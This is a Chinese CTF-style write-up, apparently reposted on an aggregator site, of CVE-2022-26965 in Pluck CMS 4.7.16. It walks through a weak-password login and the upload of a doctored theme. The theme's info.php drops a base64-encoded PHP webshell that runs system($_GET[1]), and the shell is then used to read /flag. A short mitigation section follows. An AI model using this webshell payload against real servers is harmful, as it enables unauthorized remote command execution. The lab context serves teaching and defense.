当前位置: 首页 > news >正文

做网站的网络公司揭阳关键词网站排名

做网站的网络公司,揭阳关键词网站排名,wordpress只换域名,网站备案后有可能会被注销吗简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.yayakq.cn/news/960086/

相关文章:

  • 门户网站产品设计方案安溪网站建设公司
  • 网站设计是什么意思成都小程序开发一个多少钱啊
  • 江苏网站建设网站排名优化保定 网站建设
  • 成都打鱼网站建设自建外贸网站多少钱
  • 酒泉地网站推广东北建站
  • 简易蜘蛛池网站开发做直播网站赚钱
  • 公司注册网站需要提供什么文件国内信息图制作网站
  • 加强学科网站建设网站建设源码修改
  • 做网站怎么购买主机重庆3号线
  • 网站设计的摘要杨凌区住房和城乡建设局网站
  • 怎么在搜索引擎做网站登记深圳甜富设计
  • 基于分布式控件的网站开发框架杭州注册公司有什么优惠政策
  • 用自己电脑做主机做网站wordpress中文房产主题
  • 开发一个网站做公司内部用怎么制作商城小程序
  • 网站建设案例讯息商务网站规划与建设
  • 学习搭建网站网站访问量asp
  • 电脑在哪里制作网站wordpress .htaccess 301重定向
  • 网站建设如何搭建框架windows优化大师是系统软件吗
  • 佛山移动网站设计专门做10s视频的网站
  • 去百度建网站网站建设宀金手指排名
  • 赣州九一人才网手机版郑州seo代理外包公司
  • 网站维护中 源码贵阳网站建设贵阳
  • 做网站v1认证是什么意思商城网站制作
  • 北京欢迎您网站建设电子工程网络信息技术专业
  • 团风做网站蚌埠建设网站
  • 音乐做音基题网站教育机构网站建设方案
  • 邮箱网站架构在线商城网站备案
  • 网站被降权会发生什么影响吗怎样写精品课程网站建设
  • 网页制作邢台网站公司网络服务器建设
  • 山东济宁做网站的公司有哪些网上有哪些正规赚钱的平台